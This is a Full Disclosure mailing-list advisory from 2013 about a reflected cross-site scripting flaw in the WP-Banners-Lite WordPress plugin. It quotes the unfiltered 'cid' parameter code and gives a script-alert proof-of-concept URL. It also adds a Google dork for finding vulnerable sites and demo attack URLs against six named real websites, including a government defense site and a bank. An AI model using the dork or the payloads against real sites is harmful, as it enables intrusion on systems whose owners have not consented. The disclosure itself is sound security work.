Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

XSS vulnerability on WP-Banners-Lite (wordpress plugin)
From: "Fernando A. Lagos B." <fernando () zerial org>
Date: Mon, 25 Mar 2013 08:53:28 -0300

I. Background
--------------
[-] Affected plugin: WP Banners Lite
[-] Plugin Description: The plugin easily allows you to manage ad
banners on your site.
[-] Plugin URL: http://wordpress.org/extend/plugins/wp-banners-lite/
[-] Tested Version: 1.29, 1.31, 1.40
[-] Reported: YES - but no answer
[-] Report Date: 03/12/13
[-] Published:
http://blog.zerial.org/seguridad/vulnerabilidad-en-plugin-para-wordpress-afecta-a-mas-de-200-sitios/


II. Details
------------
Cross-Site Scripting flaw discovered on WP-Banners-Lite.

The problem is wpbanners_show.php, at lines 8 and 9, the developer
doesn't filter correctly the variable called "cid" obtained from URL
(Method GET). He obtains "cid"  from URL, do a str_replace to remove '
and then he print it.

[+] File: wpbanners_show.php
[-] Line 8:   $cid = $_GET["cid"];
[-] Line 9:  $cid = str_replace("'", "", $cid);
[-] Line 51:  echo 'jQuery(\'#'.$cid.'\').replaceWith(\''.$banner.'\')';

Then, we can inject our own html or javascript code.

III. Exploit
-------------
The vulnerability can be exploited by injecting html or javascript
code as following:

http://localhost/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSS
Proof-of-Concept/)</script>

IV. URL around the world
-------------------------
[-] Google Dork: inurl:wp-banners-lite inurl:wpbanners_show filetype:php

Demo:

http://www.thexfactornews.co.uk/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=6&cid=a_8b2dfbe0c1d43f9537dae01e96458ff1%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://www.forexlistings.net/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_dc09c97fd73d7a324bdbfe7c79525f64%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://www.the-news.co/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_cf9a242b70f45317ffd281241fa66502%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://web.casinodesalamanca.es/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=2&cid=a_505259756244493872b7709a8a01b536%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

https://www.ironbank.com/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=4&cid=a_13b919438259814cd5be8cb45877d577%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

http://www.defensa.gob.ec/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=3&cid=a_94ef7214c4a90790186e255304f8fd1f%3Cem%3Ea%3Cscript%3Ealert%28/XSS/%29%3C/script%3E


cheers,
-- 
Fernando A. Lagos Berardi
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial () jabberes org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault